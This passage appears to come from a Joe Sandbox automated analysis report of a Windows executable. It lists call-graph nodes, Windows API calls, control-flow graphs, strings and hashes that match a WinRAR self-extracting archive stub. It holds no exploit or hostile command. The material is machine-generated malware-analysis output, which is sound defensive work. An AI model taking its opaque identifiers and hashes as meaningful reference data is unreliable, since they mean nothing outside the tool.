_wcslen 24666->24679 24668->24669 24671 f9c921 DeleteFileW 24668->24671 24669->24654 24669->24657 24669->24661 24669->24664 24669->24666 24672 f9cc31 GetDlgItem SetWindowTextW SendMessageW 24669->24672 24675 f9cc71 SendMessageW 24669->24675 24680 f91fbb CompareStringW 24669->24680 24705 f9a64d GetCurrentDirectoryW 24669->24705 24707 f8a5d1 6 API calls 24669->24707 24708 f8a55a FindClose 24669->24708 24709 f9b48e 76 API calls 2 library calls 24669->24709 24671->24669 24673 f9c932 24671->24673 24672->24669 24674 f84092 _swprintf 51 API calls 24673->24674 24676 f9c952 GetFileAttributesW 24674->24676 24675->24669 24676->24673 24677 f9c967 MoveFileW 24676->24677 24677->24669 24678 f9c97f MoveFileExW 24677->24678 24678->24669 24679->24668 24679->24669 24706 f8b991 51 API calls 2 library calls 24679->24706 24680->24669 24683 f9d799 __cftof _wcslen 24681->24683 24682 f9d9e7 24682->24669 24683->24682 24684 f9d8a5 24683->24684 24685 f9d9c0 24683->24685 24710 f91fbb CompareStringW 24683->24710 24687 f8a231 3 API calls 24684->24687 24685->24682 24688 f9d9de ShowWindow 24685->24688 24689 f9d8ba 24687->24689 24688->24682 24690 f9d8d9 ShellExecuteExW 24689->24690 24711 f8b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24689->24711 24690->24682 24696 f9d8ec 24690->24696 24692 f9d8d1 24692->24690 24693 f9d925 24712 f9dc3b 6 API calls 24693->24712 24694 f9d97b CloseHandle 24695 f9d989 24694->24695 24700 f9d994 24694->24700 24713 f91fbb CompareStringW 24695->24713 24696->24693 24696->24694 24698 f9d91b ShowWindow 24696->24698 24698->24693 24700->24685 24701 f9d93d 24701->24694 24702 f9d950 GetExitCodeProcess 24701->24702 24702->24694 24703 f9d963 24702->24703 24703->24694 24705->24669 24706->24679 24707->24669 24708->24669 24709->24669 24710->24684 24711->24692 24712->24701 24713->24700 24718 fac051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25428 f9e455 14 API calls ___delayLoadHelper2@8 25429 f9a440 GdipCloneImage GdipAlloc 25430 fa3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25479 fb1f40 CloseHandle 25481 f9f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25482 f9ff30 LocalFree 24759 fabb30 24760 fabb42 24759->24760 24761 fabb39 24759->24761 24763 faba27 24761->24763 24764 fa97e5 _unexpected 38 API calls 24763->24764 24765 faba34 24764->24765 24783 fabb4e 24765->24783 24767 faba3c 24792 fab7bb 24767->24792 24770 faba53 24770->24760 24771 fa8e06 __vswprintf_c_l 21 API calls 24772 faba64 24771->24772 24773 faba96 24772->24773 24799 fabbf0 24772->24799 24776 fa8dcc _free 20 API calls 24773->24776 24776->24770 24777 faba91 24809 fa91a8 20 API calls _abort 24777->24809 24779 fabada 24779->24773 24810 fab691 26 API calls 24779->24810 24780 fabaae 24780->24779 24781 fa8dcc _free 20 API calls 24780->24781 24781->24779 24784 fabb5a __FrameHandler3::FrameUnwindToState 24783->24784 24785 fa97e5 _unexpected 38 API calls 24784->24785 24790 fabb64 24785->24790 24787 fabbe8 _abort 24787->24767 24790->24787 24791 fa8dcc _free 20 API calls 24790->24791 24811 fa8d24 38 API calls _abort 24790->24811 24812 faac31 EnterCriticalSection 24790->24812 24813 fabbdf LeaveCriticalSection _abort 24790->24813 24791->24790 24793 fa4636 __cftof 38 API calls 24792->24793 24794 fab7cd 24793->24794 24795 fab7ee 24794->24795 24796 fab7dc GetOEMCP 24794->24796 24797 fab805 24795->24797 24798 fab7f3 GetACP 24795->24798 24796->24797 24797->24770 24797->24771 24798->24797 24800 fab7bb 40 API calls 24799->24800 24801 fabc0f 24800->24801 24804 fabc60 IsValidCodePage 24801->24804 24806 fabc16 24801->24806 24808 fabc85 __cftof 24801->24808 24802 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24803 faba89 24802->24803 24803->24777 24803->24780 24805 fabc72 GetCPInfo 24804->24805 24804->24806 24805->24806 24805->24808 24806->24802 24814 fab893 GetCPInfo 24808->24814 24809->24773 24810->24773 24812->24790 24813->24790 24815 fab8cd 24814->24815 24823 fab977 24814->24823 24824 fac988 24815->24824 24817 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24819 faba23 24817->24819 24819->24806 24822 faab78 __vswprintf_c_l 43 API calls 24822->24823 24823->24817 24825 fa4636 __cftof 38 API calls 24824->24825 24826 fac9a8 MultiByteToWideChar 24825->24826 24828 fac9e6 24826->24828 24836 faca7e 24826->24836 24829 faca07 __cftof __vsnwprintf_l 24828->24829 24831 fa8e06 __vswprintf_c_l 21 API calls 24828->24831 24833 faca78 24829->24833 24835 faca4c MultiByteToWideChar 24829->24835 24830 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24832 fab92e 24830->24832 24831->24829 24838 faab78 24832->24838 24843 faabc3 20 API calls _free 24833->24843 24835->24833 24837 faca68 GetStringTypeW 24835->24837 24836->24830 24837->24833 24839 fa4636 __cftof 38 API calls 24838->24839 24840 faab8b 24839->24840 24844 faa95b 24840->24844 24843->24836 24845 faa976 __vswprintf_c_l 24844->24845 24846 faa99c MultiByteToWideChar 24845->24846 24847 faab50 24846->24847 24848 faa9c6 24846->24848 24849 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24847->24849 24853 fa8e06 __vswprintf_c_l 21 API calls 24848->24853 24855 faa9e7 __vsnwprintf_l 24848->24855 24850 faab63 24849->24850 24850->24822 24851 faaa9c 24880 faabc3 20 API calls _free 24851->24880 24852 faaa30 MultiByteToWideChar 24852->24851 24854 faaa49 24852->24854 24853->24855 24871 faaf6c 24854->24871 24855->24851 24855->24852 24859 faaaab 24861 fa8e06 __vswprintf_c_l 21 API calls 24859->24861 24864 faaacc __vsnwprintf_l 24859->24864 24860 faaa73 24860->24851 24862 faaf6c __vswprintf_c_l 11 API calls 24860->24862 24861->24864 24862->24851 24863 faab41 24879 faabc3 20 API calls _free 24863->24879 24864->24863 24865 faaf6c __vswprintf_c_l 11 API calls 24864->24865 24867 faab20 24865->24867 24867->24863 24868 faab2f WideCharToMultiByte 24867->24868 24868->24863 24869 faab6f 24868->24869 24881 faabc3 20 API calls _free 24869->24881 24872 faac98 _unexpected 5 API calls 24871->24872 24873 faaf93 24872->24873 24876 faaf9c 24873->24876 24882 faaff4 10 API calls 3 library calls 24873->24882 24875 faafdc LCMapStringW 24875->24876 24877 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24876->24877 24878 faaa60 24877->24878 24878->24851 24878->24859 24878->24860 24879->24851 24880->24847 24881->24851 24882->24875 25433 fac030 GetProcessHeap 25434 f9c220 93 API calls _swprintf 25436 faf421 21 API calls __vswprintf_c_l 25437 f81025 29 API calls 25485 f81710 86 API calls 25486 f9ad10 73 API calls 25440 f9a400 GdipDisposeImage GdipFree 25441 f9d600 70 API calls 25442 fa6000 QueryPerformanceFrequency QueryPerformanceCounter 25444 faf200 51 API calls 25489 fa2900 6 API calls 4 library calls 25491 faa700 21 API calls

                                          Executed Functions

                                          Function 00F9DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00F90863: GetModuleHandleW.KERNEL32(kernel32), ref: 00F9087C
                                            • Part of subcall function 00F90863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F9088E
                                            • Part of subcall function 00F90863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F908BF
                                            • Part of subcall function 00F9A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F9A655
                                            • Part of subcall function 00F9AC16: OleInitialize.OLE32(00000000), ref: 00F9AC2F
                                            • Part of subcall function 00F9AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F9AC66
                                            • Part of subcall function 00F9AC16: SHGetMalloc.SHELL32(00FC8438), ref: 00F9AC70
                                          • GetCommandLineW.KERNEL32 ref: 00F9DF5C
                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F9DF83
                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F9DF94
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00F9DFCE
                                            • Part of subcall function 00F9DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F9DBF4
                                            • Part of subcall function 00F9DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F9DC30
                                          • CloseHandle.KERNEL32(00000000), ref: 00F9DFD7
                                          • GetModuleFileNameW.KERNEL32(00000000,00FDEC90,00000800), ref: 00F9DFF2
                                          • SetEnvironmentVariableW.KERNEL32(sfxname,00FDEC90), ref: 00F9DFFE
                                          • GetLocalTime.KERNEL32(?), ref: 00F9E009
                                          • _swprintf.LIBCMT ref: 00F9E048
                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F9E05A
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00F9E061
                                          • LoadIconW.USER32(00000000,00000064), ref: 00F9E078
                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00F9E0C9
                                          • Sleep.KERNEL32(?), ref: 00F9E0F7
                                          • DeleteObject.GDI32 ref: 00F9E130
                                          • DeleteObject.GDI32(?), ref: 00F9E140
                                          • CloseHandle.KERNEL32 ref: 00F9E183
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                          • API String ID: 3049964643-433059772
                                          • Opcode ID: fb0c0ae6e13bf8d1ab5aa0e32685da31448e440fc655f5c9b8d4dca0260a43af
                                          • Instruction ID: 7092d7cb9f72cd40e14ba31bdee8fdcb956c229a88b5d83b3c277e5b611280b5
                                          • Opcode Fuzzy Hash: fb0c0ae6e13bf8d1ab5aa0e32685da31448e440fc655f5c9b8d4dca0260a43af
                                          • Instruction Fuzzy Hash: 85612871944309AFEB20FB74ED8AF6B37ADAB44744F04042AF501972A1DB78D944FB62
                                          Function 00F9A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 812 f9a6c2-f9a6df FindResourceW 813 f9a7db 812->813 814 f9a6e5-f9a6f6 SizeofResource 812->814 816 f9a7dd-f9a7e1 813->816 814->813 815 f9a6fc-f9a70b LoadResource 814->815 815->813 817 f9a711-f9a71c LockResource 815->817 817->813 818 f9a722-f9a737 GlobalAlloc 817->818 819 f9a73d-f9a746 GlobalLock 818->819 820 f9a7d3-f9a7d9 818->820 821 f9a7cc-f9a7cd GlobalFree 819->821 822 f9a74c-f9a76a call fa0320 CreateStreamOnHGlobal 819->822 820->816 821->820 825 f9a76c-f9a78e call f9a626 822->825 826 f9a7c5-f9a7c6 GlobalUnlock 822->826 825->826 831 f9a790-f9a798 825->831 826->821 832 f9a79a-f9a7ae GdipCreateHBITMAPFromBitmap 831->832 833 f9a7b3-f9a7c1 831->833 832->833 834 f9a7b0 832->834 833->826 834->833
                                          APIs
                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6D5
                                          • SizeofResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6EC
                                          • LoadResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A703
                                          • LockResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A712
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00F9B73D,00000066), ref: 00F9A72D
                                          • GlobalLock.KERNEL32 ref: 00F9A73E
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F9A762
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00F9A7C6
                                            • Part of subcall function 00F9A626: GdipAlloc.GDIPLUS(00000010), ref: 00F9A62C
                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F9A7A7
                                          • GlobalFree.KERNEL32(00000000), ref: 00F9A7CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                          • String ID: PNG
                                          • API String ID: 211097158-364855578
                                          • Opcode ID: 5580f7c12959ea5d6b9653f8a4eaf7f5dcf926c071b0937d4f0353eb6e44a110
                                          • Instruction ID: c9c098ad67575c219ec48596f4422b030712d5d894627f293836f45211e345a9
                                          • Opcode Fuzzy Hash: 5580f7c12959ea5d6b9653f8a4eaf7f5dcf926c071b0937d4f0353eb6e44a110
                                          • Instruction Fuzzy Hash: D1317075A40306AFEB109F65EC89D1B7BBDFF85760B040619F80592221EB31ED54AEA2
                                          Function 00F8A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1025 f8a69b-f8a6bf call f9ec50 1028 f8a6c1-f8a6ce FindFirstFileW 1025->1028 1029 f8a727-f8a730 FindNextFileW 1025->1029 1030 f8a742-f8a7ff call f90602 call f8c310 call f915da * 3 1028->1030 1032 f8a6d0-f8a6e2 call f8bb03 1028->1032 1029->1030 1031 f8a732-f8a740 GetLastError 1029->1031 1036 f8a804-f8a811 1030->1036 1033 f8a719-f8a722 1031->1033 1040 f8a6fe-f8a707 GetLastError 1032->1040 1041 f8a6e4-f8a6fc FindFirstFileW 1032->1041 1033->1036 1043 f8a709-f8a70c 1040->1043 1044 f8a717 1040->1044 1041->1030 1041->1040 1043->1044 1046 f8a70e-f8a711 1043->1046 1044->1033 1046->1044 1048 f8a713-f8a715 1046->1048 1048->1033
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6C4
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6F2
                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6FE
                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A728
                                          • GetLastError.KERNEL32(?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A734
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                          • String ID:
                                          • API String ID: 42610566-0
                                          • Opcode ID: c54bc0d7649f854094ab072021edfd4e02a610cb7833c485d1e42a0e4c19a41c
                                          • Instruction ID: d8098fda8e924d373b19cc89cda1bb601b4dea11025b76d16f7e4f9c7b3668ab
                                          • Opcode Fuzzy Hash: c54bc0d7649f854094ab072021edfd4e02a610cb7833c485d1e42a0e4c19a41c
                                          • Instruction Fuzzy Hash: B5418E72900519ABDB25EF64CC88AEEB7B8FF48350F1442A6E559E3200D7346E94EF90
                                          Function 00FA7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002,00000000), ref: 00FA7E0F
                                          • TerminateProcess.KERNEL32(00000000,?,00FA7DC4,00000000,00FBC300,0000000C,00FA7F1B,00000000,00000002,00000000), ref: 00FA7E16
                                          • ExitProcess.KERNEL32 ref: 00FA7E28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: cf07181ee2d8fea0e95f734b554cee5c4f1b8db5f70c4a3157d5594ccbe72840
                                          • Instruction ID: 53c0ba248aabb8838068bfa8cb74147726fc7b50015013777ddb07e1079737e0
                                          • Opcode Fuzzy Hash: cf07181ee2d8fea0e95f734b554cee5c4f1b8db5f70c4a3157d5594ccbe72840
                                          • Instruction Fuzzy Hash: 1BE04672444248ABCF017F24CD89E4A3F6AEF11391B004554F8099A132CB3AEE92EA80
                                          Function 00F8848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: cf888c59d0b1516c7b2367e49ebe632d3be96d7117512e233fa42cbab966051e
                                          • Instruction ID: e13011e50758d171da4a1ed9558eee69252de1377704399d6091a0b0fc75ed05
                                          • Opcode Fuzzy Hash: cf888c59d0b1516c7b2367e49ebe632d3be96d7117512e233fa42cbab966051e
                                          • Instruction Fuzzy Hash: 3D824C71D04245AEDF15FF60CC85BFABBB9BF05350F4841B9E8499B142CB345A8AEB60
                                          Function 00F9B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F9B7E5
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9B8D1
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B8EF
                                          • IsDialogMessageW.USER32(?,?), ref: 00F9B902
                                          • TranslateMessage.USER32(?), ref: 00F9B910
                                          • DispatchMessageW.USER32(?), ref: 00F9B91A
                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00F9B93D
                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00F9B960
                                          • GetDlgItem.USER32(?,00000068), ref: 00F9B983
                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F9B99E
                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FB35F4), ref: 00F9B9B1
                                            • Part of subcall function 00F9D453: _wcslen.LIBCMT ref: 00F9D47D
                                          • SetFocus.USER32(00000000), ref: 00F9B9B8
                                          • _swprintf.LIBCMT ref: 00F9BA24
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                            • Part of subcall function 00F9D4D4: GetDlgItem.USER32(00000068,00FDFCB8), ref: 00F9D4E8
                                            • Part of subcall function 00F9D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00F9AF07,00000001,?,?,00F9B7B9,00FB506C,00FDFCB8,00FDFCB8,00001000,00000000,00000000), ref: 00F9D510
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F9D51B
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FB35F4), ref: 00F9D529
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D53F
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F9D559
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D59D
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F9D5AB
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D5BA
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D5E1
                                            • Part of subcall function 00F9D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FB43F4), ref: 00F9D5F0
                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00F9BA68
                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00F9BA90
                                          • GetTickCount.KERNEL32 ref: 00F9BAAE
                                          • _swprintf.LIBCMT ref: 00F9BAC2
                                          • GetLastError.KERNEL32(?,00000011), ref: 00F9BAF4
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00F9BB43
                                          • _swprintf.LIBCMT ref: 00F9BB7C
                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00F9BBD0
                                          • GetCommandLineW.KERNEL32 ref: 00F9BBEA
                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00F9BC47
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00F9BC6F
                                          • Sleep.KERNEL32(00000064), ref: 00F9BCB9
                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00F9BCE2
                                          • CloseHandle.KERNEL32(00000000), ref: 00F9BCEB
                                          • _swprintf.LIBCMT ref: 00F9BD1E
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9BD7D
                                          • SetDlgItemTextW.USER32(?,00000065,00FB35F4), ref: 00F9BD94
                                          • GetDlgItem.USER32(?,00000065), ref: 00F9BD9D
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F9BDAC
                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F9BDBB
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9BE68
                                          • _wcslen.LIBCMT ref: 00F9BEBE
                                          • _swprintf.LIBCMT ref: 00F9BEE8
                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F9BF32
                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00F9BF4C
                                          • GetDlgItem.USER32(?,00000068), ref: 00F9BF55
                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00F9BF6B
                                          • GetDlgItem.USER32(?,00000066), ref: 00F9BF85
                                          • SetWindowTextW.USER32(00000000,00FCA472), ref: 00F9BFA7
                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00F9C007
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9C01A
                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00F9C0BD
                                          • EnableWindow.USER32(00000000,00000000), ref: 00F9C197
                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00F9C1D9
                                            • Part of subcall function 00F9C73F: __EH_prolog.LIBCMT ref: 00F9C744
                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00F9C1FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                          • API String ID: 3445078344-2608530638
                                          • Opcode ID: 38b3e50e7fdf8d10217733150b38e2b3d872f3024fe2318dfa96782e51cf52c4
                                          • Instruction ID: 8f288d3a359738c350b07495e8f8a8b450389e908952cb0502281b8310e2e12c
